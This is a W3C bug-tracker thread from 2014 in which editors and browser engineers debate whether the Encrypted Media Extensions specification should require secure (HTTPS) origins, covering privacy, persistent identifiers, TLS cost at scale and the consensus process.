I think if we specify mechanisms rather than specifying outcomes, we will not end up with the outcomes we want. There is no consensus that the mechanism proposed (SSL/TLS) will address the concerns completely, or that this is the only mechanism that can address the concerns. We have a list of possible attacks and proposed mitigations. I think we would promote better user privacy and better security by adding this information to the spec, normatively if possible.
Comment 90 David Dorwin 2014-10-17 02:43:36 UTC
(In reply to Mark Watson from comment #86)
> This thread, the TAG opinion and David's comment#82 all reflect the fact
> that there are multiple ways to address the privacy and security risks that
> have been raised.
> 
> We could add additional normative requirements to the specification, though
> this requires some discussion and may not solve all problems. We could
> require secure origins, though this also requires some discussion -
> including of the mixed content problem - and still may not solve all
> problems.

I don't think the fact that there may be other problems is an argument against it. HTTPS doesn't solve phishing either, but it's still much better than nothing.

> There may also be some middle ground, where a secure origin is required
> conditionally, depending on the properties of the CDM.
> 
> In practice, in many cases, the CDM and UA implementors together can address
> the issues raised here without secure origins. In these cases they should
> not be forced to anyway require a secure origin, given the high cost of such
> a requirement on content providers.

Unless all content providers support HTTPS, requiring it is not really an option (i.e. "required conditionally") for user agents because it would result in platform segmentation (into HTTPS-requiring and HTTP-allowing clients). Do you have other suggestions on how to allow user agents to require secure origins when necessary without segmenting the platform?

It's also hard to imagine a user agent implementation that supports user permissions that should not require secure origins (at least for persisted permissions). User agents implementing such permissions give users a false sense of security and privacy, and specs should not imply that this is acceptable. We should not make the same mistake as past permission-related specs.

> We could even simply strengthen our security requirements by enumerating the
> issues and mitigations (including but not limited to secure origins) and
> requiring that implementations MUST address these: this would already be
> more than the rest of the web platform - any implementation could have
> buffer overrun vulnerabilities, for example, and we do not specify how
> browsers should address this security aspect - we just assume that they do.

Hopefully the design of the rest of the web platform does not make it more likely there will be buffer overruns. EME exposes functionality that in many implementations has such security and privacy issues by design. That’s very different. This is also one reason I have little confidence that these issues will be adequately addressed in the near future, especially without user agent enforcement of normative requirements.

(In reply to Mark Watson from comment #88)
...
> A managed migration, at a reasonable
> pace with time for software and hardware optimizations to be developed and
> deployed, has a different, lower, cost.

I also mentioned facilitating a smooth transition in comment #82. Do you have suggestions here?

The time it takes for this spec to progress through the process and for this version of it to be implemented and become a large portion of such traffic will naturally delay the impact somewhat. However, we should be clear to application authors and implementors about our intent.

> Also, HTTPS is not a panacea and we are looking at - and in some contexts
> have deployed - other approaches as well.


(In reply to Joe Steele from comment #89)
...
> I think if we specify mechanisms rather than specifying outcomes, we will
> not end up with the outcomes we want. There is no consensus that the
> mechanism proposed (SSL/TLS) will address the concerns completely, or that
> this is the only mechanism that can address the concerns. We have a list of
> possible attacks and proposed mitigations. I think we would promote better
> user privacy and better security by adding this information to the spec,
> normatively if possible.

Do you have suggestions where and how we can (normatively) promote better user privacy and better security in the spec? Regardless of the outcome of this bug, that would be a good thing.
Comment 91 David Dorwin 2014-10-24 16:54:57 UTC
The TAG adopted the following resolution [1] on privacy-sensitive features, a category that EME definitely falls into. Note that the TAG even supports changing the behavior of existing APIs even if it breaks some content. As I have said before, we should get it right the first time while we have a chance.

RESOLUTION: We support efforts by browser vendors to restrict privacy-sensitive features to secure origins. This includes ones that have not historically been restricted as such, like geolocation or webcam access.
We also support investigation into ways of preventing these features from leaking to third-party scripts within a webpage (although the exact technology to do so is unclear as yet, probably involving some combination of CSP and/or something like ).
We appreciate this could cause some short and medium-term pain (breaking some existing content), and so this needs to be done with care, but it is a worthy goal to aspire to. 
 
[1] https://github.com/w3ctag/meetings/blob/gh-pages/2014/sept29-oct1/09-29-f2f-minutes.md
Comment 92 David Dorwin 2014-10-24 16:59:05 UTC
The current text is insufficient from a security and privacy perspective. Requiring a secure origin addresses many different issues and addresses both the TAG's resolution and spec review feedback. In all the discussion over the last three months, there have been no proposals for concrete alternatives that address as many issues or can definitely be enacted in all implementations. It is also possibly the only mitigation that can be implemented entirely within the user agent.

Rather than saying EME shouldn't require a secure origin because it might be possible to implement a CDM that doesn't have these concerns, we should require it unless normative requirements that sufficiently address the concerns are defined and met.

I am going to implement the secure origin requirement for now. We can continue discussing potential mitigations for content providers. (I've started a discussion at http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0079.html.) If we come up with normative solutions or exceptions, we can consider removing the absolute requirement. If you have specific ideas for addressing the security and/or privacy concerns OR the impact on content providers, please start a thread or file a bug.
Comment 93 David Dorwin 2014-10-24 17:11:11 UTC
https://dvcs.w3.org/hg/html-media/rev/896eb33b68a2 adds the check.
Comment 94 Mark Watson 2014-10-24 17:22:06 UTC
There is clearly no consensus to require secure origins.

The text as now is will certainly cause a Formal Objection, from us at least.

I appreciate that it's useful for Editor's to have the flexibility to implement proposals that have not yet gained consensus, for the purpose of driving towards resolution of uncontroversial issues.

However, I strongly object to a process in which specification changes are made on highly contentious issues in the absence of consensus.

This is a difficult and complex topic and we should approach it collaboratively. Please revert the change so that we can do that.
Comment 95 Glenn Adams 2014-10-24 18:03:37 UTC
(In reply to Mark Watson from comment #94)
> There is clearly no consensus to require secure origins.
> 
> The text as now is will certainly cause a Formal Objection, from us at least.
> 
> I appreciate that it's useful for Editor's to have the flexibility to
> implement proposals that have not yet gained consensus, for the purpose of
> driving towards resolution of uncontroversial issues.
> 
> However, I strongly object to a process in which specification changes are
> made on highly contentious issues in the absence of consensus.
> 
> This is a difficult and complex topic and we should approach it
> collaboratively. Please revert the change so that we can do that.

I concur with Mark.
Comment 96 Joe Steele 2014-10-24 18:07:50 UTC
I also agree with Mark and Glenn.
Comment 97 David Dorwin 2014-10-24 18:25:22 UTC
(In reply to Mark Watson from comment #94)
> There is clearly no consensus to require secure origins.

And the discussion was going nowhere - many of the arguments opposing a secure origin requirement were based on hope and theoretical possibilities rather than the properties of real DRM implementations. Maybe changing the baseline will help drive a productive conversation about how to address the underlying concerns while allowing user agents to do what they believe is the right thing for their users.

> The text as now is will certainly cause a Formal Objection, from us at least.

The Formal Objection will be considered by the Director, who is also a member of the TAG. On the other hand, not requiring a secure origin may have likewise caused a Formal Objection from others, including the TAG, and resulted in EME not being allowed to progress forward in the spec process because it had not addressed the concerns of the TAG.

Your statement actually gives us a good point of reference. Short of completely removing the new step, what mitigations would cause you not to object?

> I appreciate that it's useful for Editor's to have the flexibility to
> implement proposals that have not yet gained consensus, for the purpose of
> driving towards resolution of uncontroversial issues.
> 
> However, I strongly object to a process in which specification changes are
> made on highly contentious issues in the absence of consensus.
> 
> This is a difficult and complex topic and we should approach it
> collaboratively. Please revert the change so that we can do that.

This one-line change does not prevent collaboration, but it does fix a security and privacy problem with the spec and bring it inline with the TAG's direction, which in turn brings it closer to moving forward in the spec process. It also allows us to start considering exceptions rather than going around in circles and making no progress. Unfortunately, there have been no concrete proposals suggested in the three months this bug has been open nor suggestions for addressing concerns - even when I explicitly requested them in comment #90. If this one-line change helps drive the discussion forward, then that is a good thing. (It appears to already have had such an effect: http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0081.html.)
Comment 98 Mark Watson 2014-10-24 18:30:47 UTC
(In reply to David Dorwin from comment #97)
> (In reply to Mark Watson from comment #94)
> > This is a difficult and complex topic and we should approach it
> > collaboratively. Please revert the change so that we can do that.
> 
> This one-line change does not prevent collaboration.

It does, because such non-consensual pre-emptive changes on a controversial topic completely undermine confidence that investing collaboration is likely to be productive. 

> http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0081.html.

That was in response to a long-standing commitment I made to provide such data before TPAC and nothing to do with your change.
Comment 99 Bob Lund 2014-10-24 18:34:53 UTC
(In reply to Joe Steele from comment #96)
> I also agree with Mark and Glenn.

+1
Comment 100 Glenn Adams 2014-10-24 18:48:44 UTC
(In reply to David Dorwin from comment #97)
> This one-line change does not prevent collaboration, but it does fix a
> security and privacy problem with the spec and bring it inline with the
> TAG's direction, which in turn brings it closer to moving forward in the
> spec process.

The TAG's input is just input. It doesn't mean that we must follow it. Given the significant opposition to the "one line change", it would be best to remove it until there is WG consensus on how to proceed. As editor, you serve at the behest of the WG.
Comment 101 David Dorwin 2014-10-24 21:57:12 UTC
(In reply to Glenn Adams from comment #100)
> (In reply to David Dorwin from comment #97)
> > This one-line change does not prevent collaboration, but it does fix a
> > security and privacy problem with the spec and bring it inline with the
> > TAG's direction, which in turn brings it closer to moving forward in the
> > spec process.
> 
> The TAG's input is just input. It doesn't mean that we must follow it. Given
> the significant opposition to the "one line change", it would be best to
> remove it until there is WG consensus on how to proceed. As editor, you
> serve at the behest of the WG.

The significant opposition is from a few people and is not necessarily representative of the WG. There has also been strong support for such a change.

I considered input from the TAG, WG, and other W3C members and updated the text in the Editor's Draft. This is consistent with the HTML WG's Real Work Modes (https://www.w3.org/wiki/HTML/wg/WorkMode#Editors). WG consensus will not be required unless/until the WG formally publishes the specification as a Last Call Working Draft. Hopefully we can address some of the concerns before then.


I committed https://dvcs.w3.org/hg/html-media/rev/be9998cf708c to add an issue box referencing this bug and the open questions.
Comment 102 Glenn Adams 2014-10-24 22:28:24 UTC
(In reply to David Dorwin from comment #101)
> (In reply to Glenn Adams from comment #100)
> > (In reply to David Dorwin from comment #97)
> > > This one-line change does not prevent collaboration, but it does fix a
> > > security and privacy problem with the spec and bring it inline with the
> > > TAG's direction, which in turn brings it closer to moving forward in the
> > > spec process.
> > 
> > The TAG's input is just input. It doesn't mean that we must follow it. Given
> > the significant opposition to the "one line change", it would be best to
> > remove it until there is WG consensus on how to proceed. As editor, you
> > serve at the behest of the WG.
> 
> The significant opposition is from a few people and is not necessarily
> representative of the WG.

It is certainly representative of the majority of the TF members.

> There has also been strong support for such a
> change.
> 
> I considered input from the TAG, WG, and other W3C members and updated the
> text in the Editor's Draft. This is consistent with the HTML WG's Real Work
> Modes (https://www.w3.org/wiki/HTML/wg/WorkMode#Editors). WG consensus will
> not be required unless/until the WG formally publishes the specification as
> a Last Call Working Draft. Hopefully we can address some of the concerns
> before then.
> 
> 
> I committed https://dvcs.w3.org/hg/html-media/rev/be9998cf708c to add an
> issue box referencing this bug and the open questions.

That is not adequate. Please remove the text from step 3:

If the origin of the calling context's Document is not an authenticated origin [MIXED-CONTENT], return a promise rejected with a new DOMException whose name is NotSupportedError.

If you want, you can replace it with "[TBD]" and the removed text to the Issue, with the preceding remark: "The editor proposes adding ...".

If you cannot do this, then I will be happy to submit a formal process objection to the chair.
Comment 103 Mark Watson 2014-10-25 00:41:41 UTC
(In reply to David Dorwin from comment #101)
> (In reply to Glenn Adams from comment #100)
> > (In reply to David Dorwin from comment #97)
> > > This one-line change does not prevent collaboration, but it does fix a
> > > security and privacy problem with the spec and bring it inline with the
> > > TAG's direction, which in turn brings it closer to moving forward in the
> > > spec process.
> > 
> > The TAG's input is just input. It doesn't mean that we must follow it. Given
> > the significant opposition to the "one line change", it would be best to
> > remove it until there is WG consensus on how to proceed. As editor, you
> > serve at the behest of the WG.
> 
> The significant opposition is from a few people and is not necessarily
> representative of the WG. There has also been strong support for such a
> change.
> 
> I considered input from the TAG, WG, and other W3C members and updated the
> text in the Editor's Draft. This is consistent with the HTML WG's Real Work
> Modes (https://www.w3.org/wiki/HTML/wg/WorkMode#Editors). WG consensus will
> not be required unless/until the WG formally publishes the specification as
> a Last Call Working Draft. Hopefully we can address some of the concerns
> before then.

As a co-editor, the way I interpret that process is that _ultimately_ we are operating on a consensus-based model (as distinct from the WHATWG process, for example). That means that, pragmatically, there is no point in making changes which are known to be highly controversial since it serves only to annoy people and thus stall progress. It's at least disrespectful to the goal of consensus-building.

I have no interest in participating in a standardization process that is not ultimately consensus-based - that's an oxymoron as recognized at open-stand.org.

Also as a co-editor, I guess I could just revert it myself, but commit wars are silly. Best not to start them.

Regarding the TAG opinion, as well as being just that and being worded as a recommendation, it was clearly conditional: "To the extent that privacy-invasive or security-compromising features can be normatively disallowed, EME should do so. _To the extent that they cannot be_, e.g. for robustness reasons, we _should_ restrict access to those features such that they can only be used from secure origins".

So, to truly follow their recommendation we would need to determine the extent to which privacy-invasive and security-compromising features can be normatively disallowed before we could conclude on the circumstances in which a secure origin restriction provides value.

Furthermore, recent discussion on the TAG list suggests perhaps they have not actually fully absorbed the work we have already done on privacy and security. They also say, elsewhere '... privacy-sensitive features, a category that EME definitely falls into...' suggesting they have not understood at all the conditions under which EME is no more privacy-sensitive than cookies.

> 
> 
> I committed https://dvcs.w3.org/hg/html-media/rev/be9998cf708c to add an
> issue box referencing this bug and the open questions.

That's not sufficient. Please revert the change and we can continue the technical discussion. I actually thought we were starting to make some progress.
Comment 104 David Dorwin 2014-10-25 02:16:04 UTC
(In reply to Mark Watson from comment #103)
> Regarding the TAG opinion, as well as being just that and being worded as a
> recommendation, it was clearly conditional: "To the extent that
> privacy-invasive or security-compromising features can be normatively
> disallowed, EME should do so. _To the extent that they cannot be_, e.g. for
> robustness reasons, we _should_ restrict access to those features such that
> they can only be used from secure origins".

It is more than an opinion - it a spec review adopted by the TAG. Note its new location [1].

I'm not sure why you added emphasis to "should." That is the English word "should", not RFC "SHOULD", and refers to the W3C, not user agents.

> So, to truly follow their recommendation we would need to determine the
> extent to which privacy-invasive and security-compromising features can be
> normatively disallowed before we could conclude on the circumstances in
> which a secure origin restriction provides value.

We have identified broad privacy-invasive and security-compromising issues/functionality/features that are not currently normatively disallowed. Since those privacy-invasive and security-compromising issues and features are not normatively addressed and disallowed, respectively, we should restrict access to secure origins.

Despite repeated requests, there have been no concrete proposals (other than Clear Key and intranets, which is currently being discussed [2]) for normative definitions of features or circumstances for which a secure origin restriction does not provide value. How long should we have waited before fixing the privacy and security holes in the spec? The longer we wait, the more difficult it will be for everyone to adapt and the more vulnerable implementations will ship.

> Furthermore, recent discussion on the TAG list suggests perhaps they have
> not actually fully absorbed the work we have already done on privacy and
> security. They also say, elsewhere '... privacy-sensitive features, a
> category that EME definitely falls into...' suggesting they have not
> understood at all the conditions under which EME is no more
> privacy-sensitive than cookies.

What work have we done on privacy and security? The non-normative considerations sections? Those have not received much attention when or since you wrote them, and there is still an issue in the spec stating they are incomplete. Regardless, they are not a replacement for normative text.

The text you quoted was mine from comment 91; the TAG resolution, which begins with the word "RESOLUTION."

Your assertion that "In practice there's no reason for EME in browsers to be any more privacy sensitive than regular cookies" [3] (or that this is even likely to be true for a majority of implementations) has been debunked in the www-tag thread [4].
The focus on theoretical possibilities and apparent unwillingness to address real concerns presented by real implementations has been a major hurdle to progress on this issue. I understand that some people are strongly opposed to requiring secure origins, but we cannot continue to stick our heads in the sand and hope for a good outcome on important security and privacy issues.


[1] https://github.com/w3ctag/spec-reviews/blob/master/2014/10/eme.md
[2] http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0085.html
[3] http://lists.w3.org/Archives/Public/www-tag/2014Oct/0081.html
[4] http://lists.w3.org/Archives/Public/www-tag/2014Oct/thread.html#msg77
Comment 105 Glenn Adams 2014-10-25 03:55:06 UTC
(In reply to David Dorwin from comment #104)
> We have identified broad privacy-invasive and security-compromising
> issues/functionality/features that are not currently normatively disallowed.
> Since those privacy-invasive and security-compromising issues and features
> are not normatively addressed and disallowed, respectively, we should
> restrict access to secure origins.

That is an absurd statement. Cookies suffer the same problem. Does that mean they should be restricted to secure origins?


> 
> Despite repeated requests, there have been no concrete proposals (other than
> Clear Key and intranets, which is currently being discussed [2]) for
> normative definitions of features or circumstances for which a secure origin
> restriction does not provide value.

Nobody is saying it can't potentially provide value. But value comes at a cost, and there is an apparent majority in this TF that is saying the cost is greater than the value within the near term.

> How long should we have waited before
> fixing the privacy and security holes in the spec?

Nobody is saying don't fix them. They are saying that the proposed fix is impractical for at least some period of time, probably greater than one year in duration. Should that hold up the work? No.


> The longer we wait, the
> more difficult it will be for everyone to adapt and the more vulnerable
> implementations will ship.

Implementations change all the time. So do specs. Even those of us who want to see concrete, fixed RECs understand this thing called versions. I'm sure you do. Perhaps EME1 can't and won't require security origins. Perhaps EME2 will.

The point is that it is necessary to build a consensus, and not simply adopt a controversial position that discards the positions of the TF members. As editor, you do not have that authority. If you want to have your position adopted, you need to work in the accepted process, which may be to perform a CfC within the TF and then the WG on this point. However, the way you are responding is creating an unnecessarily tense and adverse working environment in this TF by pursuing this point.

Please revert the recent change, then bring your position to the TF using standard process in order to further discuss. The longer you delay doing this, the more ill will you are generating.
Comment 106 Domenic Denicola 2014-10-25 04:54:37 UTC
(In reply to Mark Watson from comment #103)

> Furthermore, recent discussion on the TAG list suggests perhaps they have
> not actually fully absorbed the work we have already done on privacy and
> security. They also say, elsewhere '... privacy-sensitive features, a
> category that EME definitely falls into...' suggesting they have not
> understood at all the conditions under which EME is no more
> privacy-sensitive than cookies.

I categorically reject this characterization of our spec review and find it insulting.
Comment 107 Mark Watson 2014-10-25 16:11:42 UTC
(In reply to Domenic Denicola from comment #106)
> (In reply to Mark Watson from comment #103)
> 
> > Furthermore, recent discussion on the TAG list suggests perhaps they have
> > not actually fully absorbed the work we have already done on privacy and
> > security. They also say, elsewhere '... privacy-sensitive features, a
> > category that EME definitely falls into...' suggesting they have not
> > understood at all the conditions under which EME is no more
> > privacy-sensitive than cookies.
> 
> I categorically reject this characterization of our spec review and find it
> insulting.

I'm sorry, that was not my intention.

Let me restate my point in more factual terms:
- identifiers and EME is a complex topic, there are many different possible scenarios
- we address these scenarios and give mitigations in our security and privacy considerations, added under bug 22910 [1] about a year ago. We noted that further review is expected.
- the TAG opinion does not go into details regarding different identifier properties, it gives a blanket, though conditional, recommendation for secure origins
- an author of the TAG opinion said 'individualization is not an area we looked in to very much' [2],
- the same author expressed concern (and perhaps surprise) at the prospect of EME identifiers being used as 'ubercookies' and suggested mitigations which are already in the EME document [3]

We would welcome detailed feedback from TAG about the privacy section of the document and particularly the normative strength of the mitigations.

By the way, requiring secure origins does not address the problem of ubercookies, as Henri pointed out.


[1] https://www.w3.org/Bugs/Public/show_bug.cgi?id=22910
[2] http://lists.w3.org/Archives/Public/www-tag/2014Oct/0080.html
[3] http://lists.w3.org/Archives/Public/www-tag/2014Oct/0106.html
Comment 108 Ryan Sleevi 2014-10-27 00:52:41 UTC
(In reply to Glenn Adams from comment #105)
> (In reply to David Dorwin from comment #104)
> > We have identified broad privacy-invasive and security-compromising
> > issues/functionality/features that are not currently normatively disallowed.
> > Since those privacy-invasive and security-compromising issues and features
> > are not normatively addressed and disallowed, respectively, we should
> > restrict access to secure origins.
> 
> That is an absurd statement. Cookies suffer the same problem. Does that mean
> they should be restricted to secure origins?
> 

It's not at all an absurd statement. Multiple browser vendors are exploring just that - exploring ways to restrict cookies to only secure origins, for precisely the same reasons as being discussed here. Chromium, for example, has bugs https://code.google.com/p/chromium/issues/detail?id=149962 and https://code.google.com/p/chromium/issues/detail?id=399416 to track these efforts.

While it's quite obvious that EME provides worse privacy than cookies - as it offers a way to cryptographically bind a persistent identifier, rather than the existing cookie mechanisms which provide no such assurances (as they can easily be copied) - the fact that cookies exist is by no means an acceptable justification for further eroding privacy.

Regardless, it's clear from this bug that the opponents towards a secure origin requirement are not making concrete suggestions for dealing with these privacy concerns. The only options that have been put forth so far are doing nothing in the spec - which is ignoring the problem entirely - or to place a requirement in the spec for secure origins, and then work towards a consensus that can alleviate these concerns. Since it's clear that "doing nothing" is not an acceptable solution for anyone, from the TAG, to UAs, to users, the onus needs to be on those who object to secure origins to make concrete and actionable proposals to reduce that. But if no proposals can be made, secure origins are logically the least that a UA can do to address the concerns.
Comment 109 Mark Watson 2014-10-27 02:55:28 UTC
(In reply to Ryan Sleevi from comment #108)
> (In reply to Glenn Adams from comment #105)
> > (In reply to David Dorwin from comment #104)
> 
> Regardless, it's clear from this bug that the opponents towards a secure
> origin requirement are not making concrete suggestions for dealing with
> these privacy concerns. The only options that have been put forth so far are
> doing nothing in the spec - which is ignoring the problem entirely - or to
> place a requirement in the spec for secure origins, and then work towards a
> consensus that can alleviate these concerns. Since it's clear that "doing
> nothing" is not an acceptable solution for anyone, from the TAG, to UAs, to
> users, the onus needs to be on those who object to secure origins to make
> concrete and actionable proposals to reduce that. But if no proposals can be
> made, secure origins are logically the least that a UA can do to address the
> concerns.

There are mitigations to all the concerns described in the document (and if not there, in this and other threads, I believe). We can and should discuss the normative strength of those, as I have repeatedly said. We are at the very beginning of this whole discussion, not the end.

But in the end, the onus is on browser vendors to provide a viable solution because if the solution you provide is not viable - financially, say - sites will not use it. HTTPS is not there yet, as I've explained. We need alternatives - which for this problem clearly exist - and / or a reasonable industry plan to make HTTPS sufficiently reliable and efficient at scale. Sticking your head in the sand and expecting standards fiat to achieve that is not productive.
Comment 110 Ryan Sleevi 2014-10-27 03:23:59 UTC
(In reply to Mark Watson from comment #109)
> There are mitigations to all the concerns described in the document (and if
> not there, in this and other threads, I believe). We can and should discuss
> the normative strength of those, as I have repeatedly said. We are at the
> very beginning of this whole discussion, not the end.

I don't think anyone is suggesting we're near the end. However, as we continue to make progress, it's important that we set a reasonable set of expectations. It's clear - from this bug and from the related threads going on - that these concerns are not at all sufficiently normatively addressed. The secure origin proposal sets forth a baseline to make sure that, as we progress on both this issue and related, we have a reasonable path for security. Ignoring these concerns in the spec, by objecting to any sort of requirement, especially as implementations progress, is to do a disservice to the privacy of users and the interoperability concerns of UAs.
 
> But in the end, the onus is on browser vendors to provide a viable solution
> because if the solution you provide is not viable - financially, say - sites
> will not use it. HTTPS is not there yet, as I've explained. We need
> alternatives - which for this problem clearly exist - and / or a reasonable
> industry plan to make HTTPS sufficiently reliable and efficient at scale.
> Sticking your head in the sand and expecting standards fiat to achieve that
> is not productive.

I think it's a gross mischaracterization to say that HTTPS is not sufficiently reliable and efficient at scale. As discussed in this bug and related threads, it's clear that the industry disagrees (e.g. the provisioning by CloudFlare and related of free TLS for their customers or the ability of YouTube to serve video via HTTPS).

What's clear - and certainly understandable - is that some site operators have made a set of decisions that makes HTTPS less than desirable for them. That's unfortunate, but also understandable in a market where content, rather than security or scalability, are the differentiators. But that's not an intrinsic or necessary property of TLS, as clearly demonstrated by the counter-points, nor does it require "a reasonable industry plan" to make it reliable or scalable, when it's clearly and demonstrably already that.

Further, I certainly object to the characterization that UAs have an onus to "make sites use it". There are plenty of technologies that site operators have had to invest in changes to reasonably support, whether they be new protocols like SPDY or HTTP/2, security features such as Content Security Policy and HSTS, or the ongoing changing in security threats, such as deprecating SSL3.0 or SHA-1. The onus of the UA is not to get sites to adopt the latest and greatest features - it's to ensure that users' privacy and security expectations are preserved, both from 'new' threats and from new web platform features.

The prevalence of persistent and active attacks over HTTP by both ISPs (http://arstechnica.com/security/2014/10/verizon-wireless-injects-identifiers-link-its-users-to-web-requests/ , http://arstechnica.com/tech-policy/2013/04/how-a-banner-ad-for-hs-ok/ ) and by governments ( https://firstlook.org/theintercept/2014/08/15/cat-video-hack/ , http://blog.jgc.org/2011/01/code-injected-to-steal-passwords-in.html ) makes it clear to UAs that introducing new tracking mechanisms over HTTP, particularly one that has a strong cryptographic binding, represents a real risk to user privacy. In such a world, the risk posed by EME over HTTP is far greater than the risk of a site opting to not use EME at all, and any perceived value of EME is eliminated entirely due to the privacy damage caused by allowing it over HTTP. While there may be large sites who, in the face of an EME+TLS requirement, will opt not to use EME at all, I think they'll find that legacy methods - such as plugins - will also be required to use TLS or extensive user consent in the future. In the priority of constituencies, user security must and will ALWAYS trump site operators unfounded concerns.

I also think it's a mischaracterization to suggest that UAs are slaves to the spec, or that the spec somehow trumps the security concerns. The spec exists to provide interoperability between vendors, which is important, but I think you will find that when faced with a choice of interoperability versus security/privacy, UAs will consistently choose security/privacy. We see this time ( http://www.theverge.com/2013/2/23/4023078/firefox-to-start-blocking-cookies-from-third-party-advertisers ) and time again ( http://www.chromium.org/developers/npapi-deprecation ). So if the spec fails to address the security concerns - such as by failing to set the necessary normative requirements to ensure reasonable security/privacy - then I think we'll just see UAs going above and beyond what the spec requires in order to meet those concerns, rightfully placing the privacy of users over the desire of some sites to use some new feature. That's the entire point of this bug - if the spec fails to address these concerns, then we'll just see UAs doing it in ways that are potentially non-interoperable, because UAs MUST protect their users.
Comment 111 Mark Watson 2014-10-27 05:52:04 UTC
(In reply to Ryan Sleevi from comment #110)
> (In reply to Mark Watson from comment #109)
>  
> > But in the end, the onus is on browser vendors to provide a viable solution
> > because if the solution you provide is not viable - financially, say - sites
> > will not use it. HTTPS is not there yet, as I've explained. We need
> > alternatives - which for this problem clearly exist - and / or a reasonable
> > industry plan to make HTTPS sufficiently reliable and efficient at scale.
> > Sticking your head in the sand and expecting standards fiat to achieve that
> > is not productive.
> 
> I think it's a gross mischaracterization to say that HTTPS is not
> sufficiently reliable and efficient at scale. 

Well, this is just what our real-world at-scale data suggests. You can choose to change your opinion in the face of factual data, or not. Up to you. Either way, these are problems which can be solved, but not ignored.

For example, some browsers have made massive strides in recent years on TLS reliability (specifically, the frequency with which TLS connection setup fails). But this is not universal ... yet.

It would be great if you could publish server capacity figures from YouTube for HTTP vs HTTPS - I sent you the names of our contacts there who had that information.

> 
> Further, I certainly object to the characterization that UAs have an onus to
> "make sites use it".

I don't believe I said that. I said the onus on UAs is to 'provide viable solutions'. The only alternative to viable solutions in UAs is plugins and failing that, native apps.

> 
> The prevalence of persistent and active attacks over HTTP by both ISPs
> (http://arstechnica.com/security/2014/10/verizon-wireless-injects-
> identifiers-link-its-users-to-web-requests/ ,
> http://arstechnica.com/tech-policy/2013/04/how-a-banner-ad-for-hs-ok/ ) and
> by governments (
> https://firstlook.org/theintercept/2014/08/15/cat-video-hack/ ,
> http://blog.jgc.org/2011/01/code-injected-to-steal-passwords-in.html ) makes
> it clear to UAs that introducing new tracking mechanisms over HTTP,
> particularly one that has a strong cryptographic binding, represents a real
> risk to user privacy.

Again, as far as I understand it, there is no reason from our side that CDMs integrated with desktop UAs should introduce tracking concerns that are worse than cookies - at least for the basic level of robustness expected for desktop browsers. I don't believe there is a requirement for 'strong cryptographic binding'. With your permission, I could provide more information as to what I know about your solution in this respect.

> In such a world, the risk posed by EME over HTTP is
> far greater than the risk of a site opting to not use EME at all, and any
> perceived value of EME is eliminated entirely due to the privacy damage
> caused by allowing it over HTTP.

Well, this is your call if you really think EME over HTTP is worse that plugins over HTTP.

You could also remove support for plugins without making EME available as an alternative.

You're of course free to cut off support for parts of the web in your browser, if you consider those parts too dangerous for your users. You could have disabled Silverlight last year or the year before, but you didn't. What changed ? The security / privacy properties of Silverlight ? No, the availability of a viable alternative made it possible. This was a good thing, no ?

> While there may be large sites who, in the
> face of an EME+TLS requirement, will opt not to use EME at all, I think
> they'll find that legacy methods - such as plugins - will also be required
> to use TLS or extensive user consent in the future. In the priority of
> constituencies, user security must and will ALWAYS trump site operators
> unfounded concerns.

The repeated suggestion that we do not care about user privacy or security is, frankly, quite tiresome. This whole effort, over the last four years on my part, has been about migrating from the wild west of plugins to a model where this functionality is provided by User Agent implementors and so, amongst other important things, privacy and security are in the User Agent implementors' hands. And in practice this has already been achieved for desktop IE, Safari, Chrome and in due course I expect for Firefox, all over HTTP and with the User Agent implementors fully aware of the privacy properties. It's hugely disappointing to see this jeopardised just as it's coming to fruition. 

> 
> I also think it's a mischaracterization to suggest that UAs are slaves to
> the spec, or that the spec somehow trumps the security concerns. The spec
> exists to provide interoperability between vendors, which is important, but
> I think you will find that when faced with a choice of interoperability
> versus security/privacy, UAs will consistently choose security/privacy. We
> see this time (
> http://www.theverge.com/2013/2/23/4023078/firefox-to-start-blocking-cookies-
> from-third-party-advertisers ) and time again (
> http://www.chromium.org/developers/npapi-deprecation ). So if the spec fails
> to address the security concerns - such as by failing to set the necessary
> normative requirements to ensure reasonable security/privacy - then I think
> we'll just see UAs going above and beyond what the spec requires in order to
> meet those concerns, rightfully placing the privacy of users over the desire
> of some sites to use some new feature. That's the entire point of this bug -
> if the spec fails to address these concerns, then we'll just see UAs doing
> it in ways that are potentially non-interoperable, because UAs MUST protect
> their users.

Sure, and this is why we have a consensus process, which guarantees that the spec cannot ship if you really oppose it (the definition of consensus, by the way, is the lack of sustained opposition, so you need not be afraid that if you have a valid point you voice will be heard). I'm all in with that model. To me it means that we commit to adapting our service to be based on the spec, whatever it eventually says. Or, put another way, I won't agree to a spec we wouldn't be able to adapt to, I'll keep working with the rest of the group until we get to a solution which satisfies all the concerns and you all know that so you know it's worth investing in the process.

I expect others to approach this the same way. Recent events make we wonder if you, Google, are signed up to the same thing as me ?

An open standardization process is not only about documenting interoperable behavior - a private group of UA implementors could do that on their own with much less overhead. It's about committing to take seriously the concerns of multiple stakeholders, to keep on working until there is consensus, and in deference to the value that brings a willingness to accept consensus-based outcomes.
Comment 112 Ryan Sleevi 2014-10-27 06:48:42 UTC
(In reply to Mark Watson from comment #111)
> For example, some browsers have made massive strides in recent years on TLS
> reliability (specifically, the frequency with which TLS connection setup
> fails). But this is not universal ... yet.

I don't want to pivot this bug into a discussion of TLS reliability, but I do want to make sure to at least address and disabuse the meme that somehow this TLS is a browser issue. It's not, nor is the behaviour of 'legacy' browsers relevant for discussions of EME (as these browsers won't, by definition, support EME), nor is there some 'massive strides on TLS reliability' effort going on by browsers - it's servers recognizing that configuring TLS is a manageable, tractable problem that can easily be addressed by engineering. 

> It would be great if you could publish server capacity figures from YouTube
> for HTTP vs HTTPS - I sent you the names of our contacts there who had that
> information.

That's not really relevant or germane, given that this information has been provided in the past. This is not a "Google" experience that TLS scales - see http://blog.cloudflare.com/universal-ssl-how-it-scales/ for CloudFlare, http://lists.w3.org/Archives/Public/ietf-http-wg/2012JulSep/0251.html for Facebook, or https://blog.twitter.com/2013/forward-secrecy-at-twitter for Twitter - not to mention Google's own experiences at https://www.imperialviolet.org/2010/06/25/overclocking-ssl.html

The point is that yes, it's possible to engineer scalable TLS. It's also possible to engineer inefficient TLS. It's not an intrinsic property that TLS doesn't scale - quite the opposite, it's just like any other engineering problem, and one which has known solutions.

This is why I continue to object to the suggestion that this requires "industry efforts" to make TLS scale. It does, the information is readily available and deployed, the only issue is that it requires acting upon.


